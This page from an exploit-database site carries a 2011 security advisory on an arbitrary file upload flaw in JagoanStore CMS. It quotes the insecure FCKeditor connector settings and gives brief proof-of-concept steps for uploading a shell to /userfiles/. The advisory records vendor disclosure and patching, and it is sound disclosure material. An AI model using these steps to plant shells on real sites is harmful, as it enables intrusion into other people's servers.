0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

JagoanStore CMS Arbitary file upload vulnerability

Author

eidelweiss

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

===================================================================
    JagoanStore CMS Arbitary file upload vulnerability
===================================================================
 
Software: JagoanStore CMS
Vendor: www.jagoanstore.com
Price: Rp.900.000 (IDR)
Vuln Type:  Arbitary file upload
 
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss-advisories.blogspot.com
Gratz: Devilzc0de, YOGYACARDERLINK, and YOU !!!
 
References: http://eidelweiss-advisories.blogspot.com/2011/08/jagoanstore-cms-arbitary-file-upload.html
 
 
===================================================================
 
    description:
JagoanStore, adalah CMS untuk membuat toko online.
JagoanStore dibuat tidak hanya berdasar pada hal teknis pembuatan website, dalam pembuatannya juga di desain untuk membuat web toko online Anda mampu menjadi senjata ampuh bagi bisnis Anda.
Kini Anda tinggal fokus pada peningkatan penjualan online Anda.
 
----------------------------------
    Vulnerability details:
 
JagoanStore CMS is using the old version of FCKeditor for upload file to all user.And all know the old version of FCKeditor have a vulnerability and attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked.
Here is the code:
 
    /manage/fckeditor/editor/filemanager/connectors/php/config.php
 
global $Config ;
 
// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
//      authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1
 
---
 
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ;  // <= here is the path of attacker file or shell backdoor will be placed.
 
// following setting enabled.
$Config['ForceSingleExtension'] = true ;    // <= 2
 
$Config['AllowedExtensions']['File']    = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;   // <= 3
 
$Config['AllowedExtensions']['Image']	= array('bmp','gif','jpeg','jpg','png') ; 
---
 
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked
 
 
----------------------------------
 
    exploit & p0c
 
[!] http://host/manage/fckeditor/editor/filemanager/connectors/uploadtest.html    // upload your file here
    or
[!] http://host/path_to_CMSBalitbang/manage/fckeditor/editor/filemanager/connectors/uploadtest.html
 
    your shell or file will be placed here
 
[!] http://localhost/userfiles/ <= here
 
Nb: You can use trick from pentesters.ir about FCKeditor :D  
 
Advisories Time:
 
08-14-2011 (GMT+7) Bug Founded
08-15-2011 (GMT+7) Bug Reported to Vendor
08-21-2011 (GMT+7) Vendor respon and do patching (contact via online chat) :D
08-22-2011 (GMT+7) Advisories Publish
 
====================================================================
 
    Nothing Impossible In This World Even Nobody`s Perfect
 
===================================================================
 
==========================| -=[ E0F ]=- |==========================



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

JagoanStore CMS Arbitary file upload vulnerability

Report Error

Report Error